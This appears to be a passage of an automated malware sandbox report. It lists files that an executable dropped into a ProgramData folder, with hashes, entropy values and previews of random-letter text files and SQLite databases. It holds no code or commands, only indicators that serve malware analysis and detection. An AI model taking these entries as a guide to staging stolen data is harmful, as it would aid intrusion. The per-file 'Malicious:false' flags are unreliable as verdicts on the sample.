                                                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\5fctjw

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\5fctjwlno

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\5p8q9z

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\5pzmop

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                                                          MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                                                          SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                                                          SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                                                          SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\5xtr9h

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                                                          MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                                                          SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                                                          SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                                                          SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\68yukf

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                                                          MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                                                          SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                                                          SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                                                          SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\7gv37q

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\89hl6xba1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\8q9rie

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):155648
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\8qiecb

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                                                          Malicious:false
